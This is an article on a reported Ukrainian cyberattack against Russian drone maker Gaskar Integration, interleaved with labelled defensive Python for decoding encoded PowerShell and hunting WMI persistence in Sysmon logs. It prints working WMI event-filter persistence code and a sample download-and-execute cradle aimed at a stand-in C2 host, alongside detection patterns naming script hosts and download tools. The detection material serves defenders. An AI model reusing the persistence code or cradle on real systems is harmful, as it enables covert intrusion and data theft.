Last week, Ukraine's Main Intelligence Directorate (GUR) carried out a sophisticated cyberattack against Gaskar Integration, a prominent Russian drone manufacturer.
The operation began with reconnaissance of the company's publicly accessible infrastructure, where the operators identified exposed remote desktop services and outdated VPN gateways.
By exploiting a zero-day vulnerability in a third-party web application firewall, the intruders gained an initial foothold in the corporate network. Once inside, they deployed custom malware that used Windows Management Instrumentation (WMI) for lateral movement and credential harvesting.
Hromadske analysts reported that the payload was a two-stage loader written in C++ and PowerShell.
The first stage established persistence through a malicious WMI subscription, while the second stage decrypted a reverse-shell implant in memory.
Command-and-control traffic was tunneled over TLS using forged certificates that imitated the company's own public key infrastructure, so the sessions blended in with legitimate internal TLS connections.
The malware's command-and-control (C2) infrastructure was hosted on compromised industrial control system servers, which complicated attribution and takedown efforts.
By the time defenders noticed the unusual network traffic, the attackers had exfiltrated more than 47 TB of technical data, including drone design blueprints, production records and employee files.
All backup copies on the victim's servers were wiped, crippling Gaskar's manufacturing and accounting operations.
Employees lost access to production software and to the physical access-control systems; only the fire exits remained usable.
Hromadske researchers identified the implant's core modules by reverse-engineering its unpacker.
Infection Mechanism
The infection chain relied on the WAF bypass described above. After gaining access, the attackers uploaded a small dropper (under 15 KB) that executed a Base64-encoded PowerShell one-liner.
The script connected to a hard-coded C2 domain, downloaded an encrypted payload, and executed it entirely in memory so that no payload was ever written to disk for file-based detection to catch.
The persistent WMI event filter was created as follows:
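A Base64-encoded one-liner of this kind is normally passed through powershell.exe -EncodedCommand, which expects the script as UTF-16LE before Base64. The following Python is an added example (not code from the article or from the malware) showing how a responder recovers the script from a captured command line and scores it for the in-memory download-cradle indicators the article describes. The sample one-liner, the placeholder domain c2.example.invalid and the indicator list are constructed assumptions for illustration.

```python
import base64
import re
from typing import Optional

# Constructed sample one-liner of the download-and-run-in-memory kind described
# above. The domain is a placeholder, not one from the incident.
SAMPLE_ONELINER = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'http://c2.example.invalid/stage2')"
)

# Indicators commonly seen in in-memory download cradles (case-insensitive regexes).
CRADLE_PATTERNS = {
    "invoke_expression": r"\b(?:IEX|Invoke-Expression)\b",
    "webclient": r"Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\bcurl\b",
    "download": r"DownloadString|DownloadData|DownloadFile",
    "reflective_load": r"Reflection\.Assembly\]::Load",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "noprofile": r"-nop(?:rofile)?\b",
}

# Matches -e / -ec / -en / -enc / -EncodedCommand followed by a Base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:-|/)(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})")


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Inverse of encode_command. Raises ValueError on malformed Base64."""
    raw = base64.b64decode(encoded, validate=True)
    return raw.decode("utf-16-le")


def extract_encoded(cmdline: str) -> Optional[str]:
    """Return the Base64 blob that follows an -enc style flag, or None."""
    m = ENC_FLAG.search(cmdline)
    return m.group(1) if m else None


def analyze_cmdline(cmdline: str) -> dict:
    """Decode an encoded command (if present) and score the command line plus
    decoded script against CRADLE_PATTERNS. A hit is 'suspicious' when code is
    both fetched over the network and evaluated in place."""
    encoded = extract_encoded(cmdline)
    decoded = ""
    error = None
    if encoded:
        try:
            decoded = decode_command(encoded)
        except (ValueError, UnicodeDecodeError) as exc:
            error = str(exc)
    text = cmdline + " " + decoded
    hits = [name for name, pat in CRADLE_PATTERNS.items()
            if re.search(pat, text, re.IGNORECASE)]
    fetches = "download" in hits or "webclient" in hits
    evaluates = "invoke_expression" in hits or "reflective_load" in hits
    return {
        "decoded": decoded,
        "error": error,
        "hits": hits,
        "suspicious": fetches and evaluates,
    }


if __name__ == "__main__":
    enc = encode_command(SAMPLE_ONELINER)
    result = analyze_cmdline(f"powershell.exe -nop -w hidden -enc {enc}")
    print(result["decoded"])
    print(result["hits"], result["suspicious"])
```

The decoder deliberately scores the outer command line together with the decoded script, because launch flags such as -w hidden and -nop live outside the encoded blob and are themselves weak indicators.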
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter `
    -Arguments @{
        Name           = "SysUpdateFilter"
        EventNameSpace = "root\cimv2"
        QueryLanguage  = "WQL"
        # Polls Win32_LocalTime every 60 seconds; the event fires on each polling cycle
        Query          = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
    }

# $consumer is the __EventConsumer instance (for example a CommandLineEventConsumer)
# created in an earlier step that is not shown here
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding `
    -Arguments @{
        Filter   = $filter
        Consumer = $consumer
    }
Because the WITHIN 60 clause makes WMI poll Win32_LocalTime every 60 seconds, and the local time changes within every polling window, the bound consumer runs roughly once a minute. The filter, consumer and binding are stored in the WMI repository rather than in any running process, so the implant is relaunched automatically after a reboot without a Run key, scheduled task or service that defenders would more routinely inspect.
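Sysmon records the three objects behind such a subscription as Event ID 19 (filter), 20 (consumer) and 21 (binding). The Python below is an added example (not the article's or the malware's code) that correlates those records and flags the pattern above: a polling query on a timer class bound to a command-line consumer that launches a script host. The JSON lines are constructed to resemble a Winlogbeat-style export of Sysmon events; the user name CORP\svc_build, the consumer name SysUpdateConsumer and the truncated command line are assumptions, and the "SCM Event Log Filter" / "SCM Event Log Consumer" pair is the default binding Windows ships with, included so the allowlist is exercised.

```python
import json
import re

# Constructed Sysmon 19/20/21 records as JSON lines. Field names follow the
# Sysmon schema; the values are illustrative and not taken from the incident.
SAMPLE_LOG = r"""
{"EventID": 19, "EventType": "WmiFilterEvent", "Operation": "Created", "User": "CORP\\svc_build", "Namespace": "//./root/subscription", "Name": "SysUpdateFilter", "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"}
{"EventID": 20, "EventType": "WmiConsumerEvent", "Operation": "Created", "User": "CORP\\svc_build", "Name": "SysUpdateConsumer", "Type": "Command Line", "Destination": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A..."}
{"EventID": 21, "EventType": "WmiBindingEvent", "Operation": "Created", "User": "CORP\\svc_build", "Consumer": "CommandLineEventConsumer.Name=\"SysUpdateConsumer\"", "Filter": "__EventFilter.Name=\"SysUpdateFilter\""}
{"EventID": 19, "EventType": "WmiFilterEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM", "Namespace": "//./root/subscription", "Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"}
{"EventID": 20, "EventType": "WmiConsumerEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM", "Name": "SCM Event Log Consumer", "Type": "Other", "Destination": "NTEventLogEventConsumer"}
{"EventID": 21, "EventType": "WmiBindingEvent", "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM", "Consumer": "NTEventLogEventConsumer.Name=\"SCM Event Log Consumer\"", "Filter": "__EventFilter.Name=\"SCM Event Log Filter\""}
"""

# Classes whose instances change constantly, so a WITHIN poll on them is a timer.
TIMER_CLASSES = re.compile(
    r"Win32_LocalTime|Win32_UTCTime|Win32_PerfFormattedData|Win32_PerfRawData", re.IGNORECASE)
POLLING_QUERY = re.compile(r"__InstanceModificationEvent\s+WITHIN\s+(\d+)", re.IGNORECASE)
SCRIPT_HOST = re.compile(
    r"powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32", re.IGNORECASE)
COMMAND_TYPES = re.compile(r"Command ?Line|Active ?Script|Script", re.IGNORECASE)
# Default Windows binding that should not be reported.
KNOWN_GOOD = {("SCM Event Log Filter", "SCM Event Log Consumer")}


def wmi_name(ref: str) -> str:
    """Extract the object name from a reference such as __EventFilter.Name="X"."""
    m = re.search(r'Name="([^"]+)"', ref)
    return m.group(1) if m else ref


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def hunt(text: str) -> list:
    """Correlate filter, consumer and binding events; return one finding per
    suspicious binding with the reasons it was flagged."""
    events = parse_events(text)
    filters = {e["Name"]: e for e in events if e["EventID"] == 19}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20}
    findings = []
    for ev in events:
        if ev["EventID"] != 21:
            continue
        fname, cname = wmi_name(ev["Filter"]), wmi_name(ev["Consumer"])
        if (fname, cname) in KNOWN_GOOD:
            continue
        reasons = []
        flt = filters.get(fname)
        if flt is None:
            reasons.append("filter_not_seen")   # binding to a filter whose creation was not logged
        else:
            m = POLLING_QUERY.search(flt["Query"])
            if m and TIMER_CLASSES.search(flt["Query"]):
                reasons.append(f"timer_polling_query({m.group(1)}s)")
        con = consumers.get(cname)
        if con is None:
            reasons.append("consumer_not_seen")
        else:
            if COMMAND_TYPES.search(con["Type"]):
                reasons.append("command_consumer")
            if SCRIPT_HOST.search(con["Destination"]):
                reasons.append("script_host_launcher")
        if reasons:
            findings.append({"filter": fname, "consumer": cname,
                             "user": ev["User"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f)
```

The same correlation can be run against a live host by enumerating root\subscription with Get-CimInstance for __EventFilter, __EventConsumer and __FilterToConsumerBinding; any binding outside the known-good set deserves a look regardless of how innocuous its name sounds.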